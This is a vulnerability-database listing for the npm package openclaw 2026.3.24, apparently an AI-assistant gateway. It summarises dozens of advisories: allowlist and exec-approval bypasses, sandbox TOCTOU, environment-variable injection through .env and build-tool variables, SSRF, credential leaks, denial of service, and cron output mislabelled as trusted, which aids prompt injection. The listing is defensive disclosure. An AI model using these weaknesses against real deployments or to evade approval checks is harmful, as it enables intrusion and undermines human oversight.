Search for packages
| purl | pkg:npm/openclaw@2026.3.24 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-1j3m-fecr-f7cn
Aliases: CVE-2026-41376 GHSA-rg8m-3943-vm6q |
OpenClaw: Matrix thread root and reply context bypass sender allowlist ## Summary Matrix thread root and reply context bypass sender allowlist ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28 Matrix because fetched thread-root/reply context bypasses sender allowlists, with unreleased mainline filtering fix. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `8a563d603b70ef6338915f0527bee87282c3bad5` — 2026-03-31T17:09:03+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-1p3b-pfnn-x7ad
Aliases: GHSA-89hr-6x2p-8xjv |
Duplicate Advisory: OpenClaw's device removal and token revocation do not terminate active WebSocket sessions ### Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-2pr2-hcv6-7gwv. This link is maintained to preserve external references. ### Original Description OpenClaw before 2026.3.28 fails to disconnect active WebSocket sessions when devices are removed or tokens are revoked. Attackers with revoked credentials can maintain unauthorized access through existing live sessions until forced reconnection. |
Affected by 150 other vulnerabilities. |
|
VCID-1p5p-eth5-3ufu
Aliases: CVE-2026-41330 GHSA-9gp8-hjxr-6f34 |
OpenClaw: Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls ## Summary Host exec environment overrides miss proxy, TLS, Docker, and Git TLS controls ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Real in shipped v2026.3.28: host exec env policy still missed proxy, TLS, Docker, and Git TLS variables until 4d912e0451 on 2026-03-31; maintainers already accepted it and the fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `4d912e04519b4bd53b248437c53748cdebce9a41` — 2026-03-31T21:25:36+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-1pbz-8rnx-dkhe
Aliases: CVE-2026-42432 GHSA-5wj5-87vq-39xm |
OpenClaw: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement ## Impact Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement. A previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.4.5` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @zsxsoft and @KeenSecurityLab for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-1smq-mbty-jkaj
Aliases: CVE-2026-41294 GHSA-8rh7-6779-cjqq |
OpenClaw has a CWD `.env` environment variable injection which bypasses host-env policy and allows config takeover ## Summary OpenClaw loaded the current working directory `.env` before trusted state-dir configuration, allowing untrusted workspace state to inject host environment values. ## Impact A repository or workspace containing a malicious `.env` file could override runtime configuration and security-sensitive environment settings when OpenClaw started there. ## Affected Component `src/infra/dotenv.ts, src/cli/dotenv.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `6a79324802` (`Filter untrusted CWD .env entries before OpenClaw startup`). |
Affected by 150 other vulnerabilities. |
|
VCID-24m7-jx1g-hqde
Aliases: CVE-2026-41299 GHSA-6xg4-82hv-cp6f |
OpenClaw: Gateway chat.send ACP-only provenance guard could be bypassed by client identity spoofing ## Summary ACP-only provenance fields in `chat.send` were gated by self-declared client metadata from the WebSocket handshake rather than verified authorization state. ## Impact A normal authenticated operator client could spoof ACP identity labels and inject reserved provenance fields intended only for the ACP bridge. ## Affected Component `src/gateway/server-methods/chat.ts, src/gateway/server/ws-connection/message-handler.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `4b9542716c` (`Gateway: require verified scope for chat provenance`). |
Affected by 150 other vulnerabilities. |
|
VCID-258k-a4dw-tfae
Aliases: GHSA-w6wx-jq6j-6mcj |
OpenClaw: pnpm dlx approvals did not bind local script operands ## Summary Before OpenClaw 2026.4.2, `pnpm dlx` approval planning did not bind local script operands the same way as related `pnpm exec` flows. A local script approved through a `pnpm dlx` path could be replaced before execution without invalidating the approval. ## Impact An operator could approve a benign local script and then execute modified script contents through the still-valid approval plan. This was an approval-integrity bug in the node-host command-planning path. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `176c059b05357df1bc09d4328a2380670859eeff` — bind local scripts in `pnpm dlx` approval plans ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @Kazamayc for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-26kp-dbu2-pqej
Aliases: CVE-2026-41300 GHSA-9f4w-67g7-mqwv |
OpenClaw: Endpoint persists after trust decline, leaking gateway credentials ## Summary Remote onboarding preserves attacker-discovered endpoint after trust decline, routing gateway credentials to it ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped onboarding trust-decline bug because the declined discovered URL survived into the manual prompt, but operator acceptance of that prefill is still required, so medium. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2a75416634837c21ed05b8c3ed906eb7a7807060` — 2026-03-30T20:03:06+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zsxsoft for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-26sg-e29u-hkf3
Aliases: CVE-2026-41382 GHSA-x2m8-53h4-6hch |
OpenClaw: Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps ## Summary Discord voice ingress authorization can be bypassed via channel, name, and stale-role validation gaps ## Current Maintainer Triage - Status: narrow - Assessment: Real in shipped v2026.3.28 Discord voice ingress, but impact is channel/member allowlist bypass rather than a broader critical auth break and mainline fix is unreleased. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00 OpenClaw thanks @cyjhhh for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-294z-6z8j-97bx
Aliases: CVE-2026-41359 GHSA-767m-xrhc-fxm7 |
OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send ## Summary Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Real shipped operator.write to admin-class Telegram config or cron persistence bug, but it is an authenticated sink-specific escalation and high is too high given the narrower scope. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00 ## Release Process Note - The fix is already present in released version `2026.3.28`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @zpbrent for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-29a1-7ar7-67e1
Aliases: CVE-2026-43585 GHSA-xmxx-7p24-h892 |
OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation ## Summary Gateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart. ## Impact A bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out. ## Affected versions - Affected: `< 2026.4.15` - Patched: `2026.4.15` ## Fix OpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value. Verified in `v2026.4.15`: - `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot. - `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks. - `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token. Fix commit included in `v2026.4.15` and absent from `v2026.4.14`: - `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651 Thanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue. |
Affected by 24 other vulnerabilities. |
|
VCID-2c8p-gbaw-3ye4
Aliases: CVE-2026-44999 GHSA-57r2-h2wj-g887 |
OpenClaw: Isolated cron awareness events were recorded as trusted system events ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.20` - Patched version: `2026.4.20` ## Impact Output from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event. This is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. Severity is low. ## Fix OpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers. Fix commit: - `f61896b03cc7031f51106a04566831f4ac2a0bd7` ## Release Fixed in OpenClaw `2026.4.20`. |
Affected by 12 other vulnerabilities. |
|
VCID-2h6a-becf-x7ej
Aliases: CVE-2026-41915 GHSA-cm8v-2vh9-cxf3 |
OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant) ## Impact GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant). Git plumbing environment variables were not removed before host exec and could redirect Git operations. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<=2026.3.30` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-2hca-3v8f-f3e8
Aliases: CVE-2026-35663 GHSA-9hjh-fr4f-gxc4 |
OpenClaw: Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Summary Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details Backend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`. ## Fix Commit(s) - `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` | There are no reported fixed by versions. |
|
VCID-2khh-wv8p-97ff
Aliases: CVE-2026-42435 GHSA-j6c7-3h5x-99g9 |
OpenClaw: Shell-wrapper detection missed env-argv assignment injection forms ## Summary Shell-wrapper detection missed env-argv assignment injection forms. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `>= 2026.2.22 < 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact Exec preflight handling missed shell-wrapper and argv-level environment assignment forms that could affect execution semantics, including high-risk shell environment controls. ## Technical Details The fix broadens shell-wrapper detection and blocks environment assignments in argv forms. High-risk shell variables such as `SHELLOPTS` and `PS4` are covered by the host environment security policy. ## Fix The issue was fixed in #65717. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `8f8492d172f4c5b4fd7dd9a47855ed620c8770ab` - PR: #65717 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @decsecre583 for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-2mxq-krq5-bycx
Aliases: CVE-2026-43574 GHSA-49cg-279w-m73x |
OpenClaw: Empty approver lists could grant explicit approval authorization ## Summary Empty approver lists could grant explicit approval authorization. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.12` - Patched versions: `>= 2026.4.12` ## Impact For helper-backed channels, an empty resolved approver list could be interpreted as explicit approval authorization, allowing a sender outside the normal channel authorization gate to resolve pending approvals if they knew an approval id. ## Technical Details The fix prevents empty approver lists from granting explicit approval authorization and adds regression coverage for unauthorized senders. ## Fix The issue was fixed in #65714. The first stable tag containing the fix is `v2026.4.12`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `0a105c0900de701d2ee9f1abc96b017afbd0afdd` - PR: #65714 ## Release Process Note Users should upgrade to `openclaw` 2026.4.12 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @anshumanbh for reporting this issue. |
Affected by 37 other vulnerabilities. |
|
VCID-2uqu-k42d-1baq
Aliases: GHSA-rm5c-4rmf-vvhw |
OpenClaw: Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses ## Summary Sandbox file operations use check-then-act, bypassing fd-based TOCTOU defenses ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: Released workspace-only apply_patch remove and mkdir operations were still check-then-act, but the draft overstates scope by bundling broader edit paths; keep it open but narrow it to the actual sandbox-workspace mutation boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `32a4a47d602e0618f87b3e59f94d8c142767f860` — 2026-03-30T16:49:49+01:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-2v8n-mnws-jfc9
Aliases: CVE-2026-41390 GHSA-6pfc-6m7w-m8fx |
OpenClaw has a gateway exec allowlist allow-always bypass via unregistered /usr/bin/script wrapper ## Summary Allow-always persistence did not unwrap `/usr/bin/script` and similar wrappers to the actual executed target before storing trust decisions. ## Impact A user approval for one wrapped command could persist trust for a wrapper binary that later executed a different underlying program. ## Affected Component `src/infra/dispatch-wrapper-resolution.ts, src/infra/exec-wrapper-resolution.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `83da3cfe31` (`infra: unwrap script wrapper approval targets`). |
Affected by 150 other vulnerabilities. |
|
VCID-2wr9-h42m-a7ev
Aliases: CVE-2026-41408 GHSA-4g5x-2jfc-xm98 |
OpenClaw: Tlon media downloads can bypass core safety limits and exhaust disk ## Summary Tlon media downloads can bypass core safety limits and exhaust disk ## Current Maintainer Triage - Status: narrow - Normalized severity: low - Assessment: Shipped v2026.3.28 Tlon media downloads bypassed core size/count/cleanup limits, but this is availability-only resource exhaustion in a bundled plugin path, so low. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2194587d70d2aef863508b945319c5a7c88b12ce` — 2026-03-31T19:40:15+09:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-32zs-2zs9-uufs
Aliases: GHSA-f6pf-4gjx-c94r |
OpenClaw: Media Parsing Path Traversal Leads to Arbitrary File Read ## Summary OpenClaw <= 2026.3.24 Media Parsing Path Traversal to Arbitrary File Read ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.24` - Patched versions: `>= 2026.3.28` - First stable tag containing the fix: `v2026.3.28` ## Fix Commit(s) - `4797bbc5b96e2cca5532e43b58915c051746fe37` — 2026-03-25T13:35:16-06:00 ## Release Process Note - The fix is already present in released version `2026.3.28`. |
Affected by 150 other vulnerabilities. |
|
VCID-356u-h788-pkgt
Aliases: CVE-2026-40045 GHSA-83f3-hh45-vfw9 |
OpenClaw: Android accepted cleartext remote gateway endpoints and sent stored credentials over ws:// ## Summary Before OpenClaw 2026.4.2, Android accepted non-loopback cleartext `ws://` gateway endpoints and would send stored gateway credentials over that connection. Discovery beacons or setup codes could therefore steer the client onto a cleartext remote endpoint. ## Impact A user who followed a forged discovery result or scanned a crafted setup code could disclose stored gateway credentials to an attacker-controlled endpoint in plaintext. This was a transport-security bug in the Android gateway client. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `<= 2026.4.1` - Patched versions: `>= 2026.4.2` - Latest published npm version: `2026.4.1` ## Fix Commit(s) - `a941a4fef9bc43b2973c92d0dcff5b8a426210c5` — require TLS for remote Android gateway endpoints ## Release Process Note The fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live. Thanks @zsxsoft for reporting. |
Affected by 80 other vulnerabilities. |
|
VCID-37ep-9smd-zuh9
Aliases: CVE-2026-41399 GHSA-f44p-c7w9-7xr7 |
OpenClaw: Gateway WebSocket Denial of Service via unbounded pre-auth upgrades ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `cb5f7e201f` (`gateway: cap concurrent pre-auth websocket upgrades`). Discovered by:Topsec AlphaLab (wang dong) |
Affected by 150 other vulnerabilities. |
|
VCID-38g8-39ek-xbat
Aliases: GHSA-w85g-3h6x-4xh2 |
OpenClaw: Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS ## Summary Image pixel-limit guard can fail open on sips and allow decompression-bomb DoS ## Current Maintainer Triage - Status: open - Normalized severity: medium - Assessment: Shipped v2026.3.28 image processing could fail open on oversized pixel counts and allow decompression-bomb DoS, an availability issue that is valid at medium. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `0ed4f8a72bb140045962e97ab01c94c076b758a4` — 2026-03-31T22:52:55+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-3bdd-a9nw-13bn
Aliases: GHSA-9p93-7j67-5pc2 |
OpenClaw: Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding ## Summary Gateway HTTP /sessions/:sessionKey/kill Reaches Admin Kill Path Without Caller Scope Binding. ## Details The HTTP route previously treated any bearer-authenticated request as admin-eligible and could call without binding the action to requester ownership or caller-granted operator scopes. The flaw removes the bearer-token admin fallback and keeps remote session kills on the local-admin or requester-owned path only. | There are no reported fixed by versions. |
|
VCID-3wsw-d4z2-dydt
Aliases: GHSA-f693-58pc-2gfr |
OpenClaw: Telegram legacy allowFrom migration fans default-account trust into all named accounts ## Summary Telegram legacy allowFrom migration fans default-account trust into all named accounts ## Current Maintainer Triage - Status: open - Normalized severity: low - Assessment: Shipped v2026.3.28 Telegram migration fans legacy default-account allowFrom trust into named accounts, which is an in-scope auth-boundary bug and low fits. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `d8c68c8d4265ea6fa5e8c5e056534c351bddef37` — 2026-03-31T12:51:38+01:00 ## Release Process Note - The fix is already present in released version `2026.3.31`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @smaeljaish771 for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-3xmj-n798-x3cw
Aliases: CVE-2026-43527 GHSA-53vx-pmqw-863c |
OpenClaw: Browser SSRF policy default allowed private-network navigation ## Summary Browser SSRF policy default allowed private-network navigation. ## Affected Packages / Versions - Package: `openclaw` - Ecosystem: npm - Affected versions: `< 2026.4.14` - Patched versions: `>= 2026.4.14` ## Impact Browser SSRF protection could allow private-network navigation by default in paths where restrictive behavior was expected, exposing internal services or metadata endpoints through browser-driven requests. ## Technical Details The fix preserves strict SSRF configuration semantics, keeps private-network access disabled unless explicitly opted in, and updates loopback CDP readiness handling for the stricter default. ## Fix The issue was fixed in #66354 and #66386. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix. ## Fix Commit(s) - `024f4614a1a1831406e763adc40ef226e3d5e9ed` - `1dabfef28db523e7de81edeb3dd689e9171236a2` - `213c36cf51121ef6c05cfccd78037371f968f31a` - `7eecfa411df3d12e6b810e6ca5df47254fc3db3f` - PR: #66354, #66386 ## Release Process Note Users should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix. ## Credits Thanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue. |
Affected by 30 other vulnerabilities. |
|
VCID-3zwq-dz2u-pqgv
Aliases: CVE-2026-42427 GHSA-7437-7hg8-frrw |
OpenClaw: HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class) ## Impact HGRCPATH, CARGO_BUILD_RUSTC_WRAPPER, RUSTC_WRAPPER, and MAKEFLAGS missing from exec env denylist — RCE via build tool env injection (GHSA-cm8v-2vh9-cxf3 class). Missing denylist entries allowed hostile build-tool environment variables to influence host exec commands. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. ## Affected Packages / Versions - Package: `openclaw` (npm) - Affected versions: `< 2026.4.8` - Patched versions: `2026.4.8` ## Fix The issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`. ## Verification The fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary. ## Credits Thanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting. |
Affected by 60 other vulnerabilities. |
|
VCID-3zx4-t8cj-kbfn
Aliases: CVE-2026-41329 GHSA-g5cg-8x5w-7jpm |
OpenClaw: Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation ## Summary Heartbeat context inheritance bypasses sandbox via senderIsOwner escalation ## Current Maintainer Triage - Status: open - Normalized severity: Critical ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `a30214a624946fc5c85c9558a27c1580172374fd` — 2026-03-31T09:06:51+09:00 OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-4316-7q9a-xuhx
Aliases: CVE-2026-45005 GHSA-q8ff-7ffm-m3r9 |
OpenClaw's Webhooks SecretRef route secret remains valid after rotation/reload ## Summary OpenClaw webhooks allowed route secrets to be backed by `SecretRef` values, but cached the resolved secret for a route. After an operator rotated the underlying secret and ran `openclaw secrets reload`, the previous resolved webhook secret could remain valid until the plugin or gateway restarted. ## Impact An attacker who already had a previously valid webhook route secret could continue authenticating webhook requests after the operator rotated the secret and reloaded secrets. This weakened credential rotation for webhook routes and could allow continued invocation of the configured webhook task flow until restart. ## Affected Packages / Versions - Package: `openclaw` on npm - Affected: versions before `2026.4.23` - Fixed: `2026.4.23` - Latest stable verified fixed: `openclaw@2026.4.23`, tag `v2026.4.23` ## Fix Webhook route authentication now resolves `SecretRef`-backed route secrets on each request. A rotated secret becomes effective after `openclaw secrets reload` without requiring a gateway or plugin restart, and the old secret is rejected. ## Fix Commit(s) - `36c4a372a0ad5dca8bfc0d93f7aab9c2f2de66fa` (`fix(webhooks): reload route secrets per request`) ## Severity Severity remains `medium`. The attack requires possession of a previously valid route secret, but the stale credential can continue to authorize webhook actions after rotation. |
Affected by 0 other vulnerabilities. |
|
VCID-4hz5-f2pw-3yb4
Aliases: CVE-2026-41394 GHSA-mhgq-xpfq-6r66 |
OpenClaw: Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scopes ## Current Maintainer Triage - Status: narrow - Normalized severity: medium - Assessment: v2026.3.28 still gives auth:"plugin" routes operator WRITE_SCOPE, but impact should stay limited to plugin routes that actually touch privileged runtime actions before plugin auth completes. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.28` - Patched versions: `>= 2026.3.31` - First stable tag containing the fix: `v2026.3.31` ## Fix Commit(s) - `2a1db0c0f1fa375004a95ba0ef030534790a6d47` — 2026-04-01T00:20:49+09:00 OpenClaw thanks @davidluzsilva for reporting. |
Affected by 97 other vulnerabilities. |
|
VCID-4jwj-6s5z-wbeq
Aliases: CVE-2026-33576 GHSA-v2v2-f783-358j |
OpenClaw: Zalo channel downloads media before sender authorization ## Summary The Zalo image path fetched and stored inbound media before the DM/pairing authorization checks ran. ## Impact Unauthorized senders could force network fetches and disk writes in the inbound media store even when the message itself was rejected. ## Affected Component `extensions/zalo/src/monitor.ts` ## Fixed Versions - Affected: `<= 2026.3.24` - Patched: `>= 2026.3.28` - Latest stable `2026.3.28` contains the fix. ## Fix Fixed by commit `68ceaf7a5f` (`zalo: gate image downloads before DM auth`). OpenClaw thanks @AntAISecurityLab for reporting. |
Affected by 150 other vulnerabilities. |
|
VCID-4nwq-14y4-xkhp
Aliases: CVE-2026-35623 GHSA-xq8g-hgh6-87hv |
OpenClaw: BlueBubbles Webhook Missing Rate Limiting Enables Brute-Force Password Guessing ## Summary BlueBubbles Webhook Missing Guess Rate Limiting Enables Brute-Force Guessing of Weak Webhook Password ## Affected Packages / Versions - Package: `openclaw` - Affected versions: `<= 2026.3.24` - First patched version: `2026.3.25` - Latest published npm version at verification time: `2026.3.24` ## Details BlueBubbles webhook auth previously rejected wrong passwords without throttling repeated guesses, allowing brute-force attempts against weak webhook passwords. Commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92` adds repeated-guess throttling before auth failure responses. Verified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `5e08ce36d522a1c96df2bfe88e39303ae2643d92`. ## Fix Commit(s) - `5e08ce36d522a1c96df2bfe88e39303ae2643d92` | There are no reported fixed by versions. |
|
VCID-4u3z-rs45-gbhe
Aliases: CVE-2026-45003 GHSA-55cf-xx38-4p9p |
OpenClaw: Workspace dotenv files cannot override connector endpoint hosts ## Summary Workspace dotenv files cannot override connector endpoint hosts. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint. ## Fix Workspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate. ## Fix Commit(s) - 0623079e98abf7202591f1b04a89755eb7ec9272 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @qi-scape for reporting. |
Affected by 3 other vulnerabilities. |
|
VCID-4uqc-3h1c-4yhs
Aliases: CVE-2026-35640 GHSA-3h52-cx59-c456 |
